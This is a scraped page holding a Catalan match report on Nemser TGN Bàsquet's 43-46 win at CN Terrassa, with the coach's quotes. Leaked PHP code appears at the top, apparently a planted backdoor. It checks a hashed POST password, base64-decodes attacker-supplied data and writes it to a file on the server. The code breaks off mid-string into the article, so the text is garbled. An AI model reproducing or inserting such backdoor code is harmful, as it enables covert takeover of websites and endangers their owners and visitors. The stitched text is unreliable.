function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Victòria a Terrassa i final de la mala ratxa (43-46) - Tgn Bàsquet Club -

Victòria a Terrassa i final de la mala ratxa (43-46)

Updated: octubre 21, 2013

Per fi. El Nemser TGN Bàsquet va aconseguir trencar una ratxa negativa que durava ja tres setmanes i va poder celebrar un triomf balsàmic. L’equip de Juan Carlos Arjona va vèncer a la pista del CN Terrassa (43-46) després de fer una reacció prodigiosa al final del tercer quart que li va servir per canviar la dinàmica del partit i, de retruc, donar la volta al resultat tot duent la iniciativa fins al final.

Les visitants, amb les baixes de Laura Martínez i Anais Muñoz van començar malament. La pressió a tota la pista, tan efectiva en d’altres partits, va fer aigües i el Terrassa se’n va aprofitar per anotar amb comoditat (10-2 minut 7). Si la defensa no era prou bona, l’atac era pitjor. Les visitants no tenien les idees clares, esgotaven les possessions i quan aconseguien un tir còmode, no estaven encertades. Així es va arribar al final del primer quart amb un marcador baix (16-7). Les coses no van canviar gaire en el segon període i la capacitat anotadora del Nemser començava a ser preocupant, doncs al descans el marcador era de 22-16.

Al tercer període van sonar totes les alarmes. El CN Terrassa obria un forat en el resultat i es distanciava a l’equador del quart (37-28, minut 25). Arjona va demanar temps, però les locals continuaven dominant fins que van arribar els dos últims minuts del període. Les jugadores de l’equip lila van serrar les dents i van jugar amb més determinació en atac i més agressives en defensa, fet que les va permetre recuperar moltes pilotes i marcar un parcial de 2-12 en tan sols dos minuts que els donava, per primera vegada en tot el partit, la iniciativa en el resultat (32-34).

Els últims deu minuts van ser d’infart. El Nemser TGN Bàsquet, però, manava i va gaudir d’un màxim avantatge de 5 punts (37-42 a dos minuts del final) que va saber administrar tot i els esforços del conjunt local.

JUAN CARLOS ARJONA. Entrenador del Nemser TGN Bàsquet

“L’equip es mereixia aquesta victòria perquè estàvem treballant molt bé des de l’inici de temporada i els resultats no mostraven la feina que estàvem fent”

“El triomf suposa una injecció de moral en vista als propers partits, sobretot si tenim en compte que havíem perdut els tres últims enfrontaments”